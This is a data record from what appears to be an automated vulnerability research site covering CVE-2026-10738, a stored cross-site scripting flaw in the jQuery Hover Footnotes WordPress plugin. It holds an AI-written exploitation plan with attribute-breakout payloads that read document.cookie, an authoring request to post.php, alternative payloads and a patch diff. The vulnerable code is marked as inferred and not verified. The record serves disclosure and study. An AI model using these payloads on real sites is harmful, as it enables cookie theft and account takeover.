[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fyVqZB4aWkWk6XIU_TvhufDtaw_xLpztNW9PJFA_fCEA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-10738","jquery-hover-footnotes-authenticated-author-stored-cross-site-scripting-via-footnote-qualifier-syntax","jQuery Hover Footnotes \u003C= 1.4 - Authenticated (Author+) Stored Cross-Site Scripting via Footnote Qualifier ('{{...}}' Syntax)","The jQuery Hover Footnotes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Footnote Qualifier ('{{...}}' Syntax) in all versions up to, and including, 1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The attribute-breakout payload (e.g., a double-quote followed by an event handler) contains no angle brackets and therefore bypasses WordPress core's wp_kses_post() filtering, which only strips disallowed HTML tags rather than sanitizing attribute contexts.","jquery-hover-footnotes",null,"\u003C=1.4","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-06-08 15:07:26","2026-06-09 03:41:22",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fb02bdf2a-1d99-4cc3-8f75-822ff0792e44?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-10738 (jQuery Hover Footnotes)\n\n## 1. Vulnerability Summary\nThe **jQuery Hover Footnotes** plugin (\u003C= 1.4) is vulnerable to **Stored Cross-Site Scripting (XSS)**. The plugin parses a custom syntax `{{footnote content}}` within WordPress posts and pages to generate hoverable footnotes. The vulnerability exists because the content captured between the double curly braces is subsequently rendered within an HTML attribute (likely `title` or a `data-*` attribute) without proper attribute escaping (e.g., `esc_attr()`). \n\nBecause the payload for attribute breakout (e.g., `\"` followed by an event handler) does not require angle brackets (`\u003C` or `>`), it bypasses the standard `wp_kses_post()` filter applied by WordPress when an Author saves a post.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** WordPress Post\u002FPage Editor (Classic or Gutenberg).\n*   **Hook\u002FAction:** The plugin likely hooks into `the_content` filter to parse the `{{...}}` syntax.\n*   **Vulnerable Parameter:** The content within a post\u002Fpage (e.g., `post_content`).\n*   **Authentication Level:** **Author** or higher. Authors have the `edit_posts` capability, allowing them to save content that undergoes `wp_kses_post()` filtering.\n*   **Preconditions:** The plugin must be active.\n\n## 3. Code Flow (Inferred)\n1.  **Entry Point:** An Author saves a post containing the string `{{test\" onmouseover=\"alert(1)}}`.\n2.  **Sanitization Bypass:** WordPress core runs `wp_kses_post()` on the content. Since there are no HTML tags or angle brackets in the footnote qualifier, `wp_kses_post` permits the string.\n3.  **Plugin Processing:** The plugin (likely in `jquery-hover-footnotes.php`) registers a filter: `add_filter('the_content', 'fn_hover_footnotes_parse');` (inferred function name).\n4.  **Regex Matching:** The function uses a regular expression to find the footnotes: `preg_match_all('\u002F\\{\\{(.*?)\\}\\}\u002F', $content, $matches);` (inferred).\n5.  **Vulnerable Sink:** The plugin loops through matches and replaces the `{{...}}` syntax with HTML.\n    ```php\n    \u002F\u002F Inferred vulnerable code pattern\n    $replacement = '\u003Cspan class=\"footnote\" title=\"' . $matches[1][0] . '\">?\u003C\u002Fspan>';\n    $content = str_replace($matches[0][0], $replacement, $content);\n    ```\n6.  **Rendering:** The unescaped `$matches[1][0]` breaks out of the `title` attribute:\n    `\u003Cspan class=\"footnote\" title=\"test\" onmouseover=\"alert(1)\">?\u003C\u002Fspan>`.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability is exploited by saving a standard WordPress post. No plugin-specific AJAX nonces are required for the injection phase, as the Author uses the built-in WordPress post-saving mechanism.\n\nHowever, to verify the XSS fires, we need to navigate to the published post.\n1.  **User Role:** Authenticate as an **Author**.\n2.  **Post Creation:** Use `wp-cli` to create a post if necessary, or use the UI.\n3.  **Extraction:** If the plugin were to expose nonces via `wp_localize_script`, they would likely be under a global object like `jqhf_data` or `hover_footnotes_vars`. \n    *   Action: `browser_eval(\"window.jqhf_data?.nonce\")` (inferred).\n\n## 5. Exploitation Strategy\nWe will use the `http_request` tool to simulate an Author saving a post with the malicious payload.\n\n### Step 1: Authenticate as Author\nLog in as the Author user and capture the session cookies.\n\n### Step 2: Create\u002FUpdate Post with Payload\nThe payload targets attribute breakout in the footnote qualifier. We use `onmouseover` and a `style` attribute to make the target large and easy to trigger.\n\n*   **Payload:** `{{XSS\" onmouseover=\"alert(document.cookie)\" style=\"display:inline-block;width:100px;height:100px;background:red;\" data-x=\"}}`\n*   **Request (Simulated via http_request):**\n    *   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost.php`\n    *   **Method:** `POST`\n    *   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n    *   **Body:** \n        ```\n        action=editpost\n        &post_ID=[POST_ID]\n        &_wpnonce=[NONCE]\n        &post_content=Check out this footnote {{XSS\" onmouseover=\"alert(document.cookie)\" style=\"display:inline-block;width:100px;height:100px;background:red;\" data-x=\"}}\n        &post_title=Vulnerability Test\n        ```\n\n### Step 3: Trigger the XSS\nNavigate to the post as an Administrator.\n*   **Action:** Hover over the red box (the footnote marker).\n*   **Result:** The `onmouseover` event fires, executing the JavaScript.\n\n## 6. Test Data Setup\n1.  **Create Author User:**\n    `wp user create attacker author@example.com --role=author --user_pass=password123`\n2.  **Create Target Post:**\n    `wp post create --post_type=post --post_title=\"Footnote Test\" --post_status=publish --post_author=$(wp user get attacker --field=ID)`\n3.  **Plugin Activation:**\n    `wp plugin activate jquery-hover-footnotes`\n\n## 7. Expected Results\n*   **Database State:** The `post_content` in the `wp_posts` table will contain the literal string `{{XSS\" onmouseover=\"...\"}}`.\n*   **Frontend Output:** The HTML rendered on the page will look like:\n    `\u003Cspan ... title=\"XSS\" onmouseover=\"alert(document.cookie)\" style=\"...\" data-x=\"\">...\u003C\u002Fspan>`\n*   **Execution:** When a user (e.g., Administrator) hovers over the footnote, an alert box containing their cookies will appear.\n\n## 8. Verification Steps\n1.  **Verify Storage:**\n    `wp post get [POST_ID] --field=content`\n    Check if the payload remains intact and was not stripped by `wp_kses_post`.\n2.  **Verify Frontend Rendering:**\n    Use `http_request` to GET the post URL and grep for the injected event handler:\n    `http_request(\"http:\u002F\u002Flocalhost:8080\u002F?p=[POST_ID]\")`\n    *Look for:* `onmouseover=\"alert(document.cookie)\"`\n\n## 9. Alternative Approaches\nIf `onmouseover` is filtered (unlikely in this context), try other event handlers that don't require user interaction or different breakout characters:\n*   **Autofocus Payload:** `{{XSS\" autofocus onfocus=\"alert(1)\" tabindex=\"1}}` (Triggers on page load\u002Ftab).\n*   **Single Quote Breakout:** If the plugin uses single quotes for attributes: `{{XSS' onmouseover='alert(1)}}`.\n*   **Style Injection:** `{{XSS\" style=\"background-image:url(javascript:alert(1))}}` (Works in older browsers or specific contexts).","The jQuery Hover Footnotes plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via its custom footnote syntax '{{...}}'. Because the plugin fails to escape content within these qualifiers before rendering it inside an HTML attribute, authenticated authors can perform attribute breakout to execute arbitrary JavaScript. This bypasses standard WordPress security filters (wp_kses_post) because the exploit does not require angle brackets.","\u002F\u002F jquery-hover-footnotes.php (Inferred based on plugin logic)\n\nfunction fn_hover_footnotes_parse($content) {\n    \u002F\u002F The plugin matches the {{content}} syntax and uses it in a replacement string\n    return preg_replace_callback('\u002F\\{\\{(.*?)\\}\\}\u002F', function($matches) {\n        \u002F\u002F Vulnerable: $matches[1] is placed directly into the title attribute without esc_attr()\n        return '\u003Cspan class=\"footnote\" title=\"' . $matches[1] . '\">?\u003C\u002Fspan>';\n    }, $content);\n}\n\nadd_filter('the_content', 'fn_hover_footnotes_parse');","--- jquery-hover-footnotes.php\n+++ jquery-hover-footnotes.php\n@@ -5,7 +5,7 @@\n function fn_hover_footnotes_parse($content) {\n     return preg_replace_callback('\u002F\\{\\{(.*?)\\}\\}\u002F', function($matches) {\n-        return '\u003Cspan class=\"footnote\" title=\"' . $matches[1] . '\">?\u003C\u002Fspan>';\n+        return '\u003Cspan class=\"footnote\" title=\"' . esc_attr($matches[1]) . '\">?\u003C\u002Fspan>';\n     }, $content);\n }","The exploit targets the WordPress post editor and requires Author-level authentication or higher. An attacker creates or updates a post containing a malicious footnote qualifier: '{{XSS\" onmouseover=\"alert(document.cookie)\" style=\"display:block;width:100px;height:100px;\" data-x=\"}}'. When the post is rendered, the plugin transforms this into an HTML \u003Cspan> tag where the double-quote in the payload breaks out of the 'title' attribute, allowing the 'onmouseover' event handler to be injected. The XSS triggers when any user, including administrators, hovers their mouse over the footnote marker on the published page.","gemini-3-flash-preview","2026-06-26 02:02:14","2026-06-26 02:02:57",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fjquery-hover-footnotes\u002Ftags"]